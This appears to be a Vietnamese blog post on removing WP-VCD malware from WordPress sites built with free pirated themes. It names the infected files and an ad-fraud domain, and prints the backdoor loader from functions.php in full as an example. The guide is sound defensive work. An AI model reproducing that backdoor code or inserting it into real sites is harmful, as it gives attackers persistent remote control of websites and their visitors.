Mã nguồn mở Wordpress là mã nguồn được sử dụng phổ biến hiện nay để xây dựng các website bán hàng, tin tức, blog, website công ty... Nhưng thực tế thấy rõ, điển hình như ở Việt Nam, rất nhiều website ở Việt Nam sử dụng mã nguồn mở Wordpress với những giao diện (theme) tải miễn phí trên mạng. Những giao diện được chia sẻ miễn phí đó thường được cài thêm những mã nguồn ẩn khiến website bị cảnh báo gây nguy hại cho người sử dụng. Những mã nguồn độc ấy được cài vào với nhiều mục đích khác nhau: quảng cáo click, lấy thông tin người dùng...
Những website có dính mã nguồn độc hại sẽ bị Google Ads từ chối xét duyệt quảng cáo và thường là tên miền đang sử dụng cũng bị "ban" luôn.
Ngay lúc này, việc đầu tiên bạn nên làm là quét lại tất cả các website của mình xem đã thực sự sạch chưa. Các công cụ online để kiểm tra tình trạng website có rất nhiều (như Sucuri, Virustotal, Quttera...). Và thường các bạn sẽ nhận được cảnh báo mã nguồn độc chứa link quảng cáo lạ như "deloplen.com/apu.php?". OK! Bây giờ chúng ta sẽ đi tìm nó và gỡ.
Xóa code kích hoạt mã nguồn độc trong file Function.php
- Nếu bạn có quyền truy cập host, bạn sẽ tìm thấy file function.php theo đường dẫn: /public_html/wp-content/themes/<tên-giao-diện>
- Nếu bạn truy cập thông qua trang quản trị admin: Tại giao diện quản trị chọn Giao diện (Theme) > Sửa giao diện (Edit) > tìm đến file function.php
Đoạn code kích hoạt mã nguồn độc thường sẽ nằm ngay những dòng đầu tiên kiểu như sau:
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd3c675a56fea936c4023d4fee2c238fa')){ $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain';if ($file = @file_get_contents(__FILE__))if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { {if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)){ $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true";{} } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__))@file_put_contents(__FILE__, $file);if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); print "true"; } } } } break;}default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; }die("");
Đừng quên backup file trước khi xóa đoạn code trên, sau đó thử load lại trang để kiểm tra xem việc xóa đoạn code trên có ảnh hưởng đến hoạt động của website hay không.
Xóa mã nguồn và link độc trong Post
Để làm được thao tác này yêu cầu bạn phải có quyền truy cập vào hosting lưu trữ code website.
Mã nguồn độc có thể xuất hiện trong các file:
/public_html/wp-includes/wp-feed.php
/public_html/wp-includes/wp-tmp.php
/public_html/wp-includes/wp-vcd.php
Kiểm tra 3 file trên xem có phát hiện link lạ đi ra bên ngoài hay những đoạn script đáng nghi ngờ không. Nếu có thì hãy xóa các link là đi là được.
(thường thì bạn sẽ tìm thấy deloplen.com / apu.php? trong file wp-tmp.php, đừng ngần ngại hãy xóa đoạn script chứa nó đi)
Bây giờ hãy xóa toàn bộ cache và thử kiểm tra lại website bằng các công cụ kiểm tra mã nguồn độc.
0 nhận xét:
Post a Comment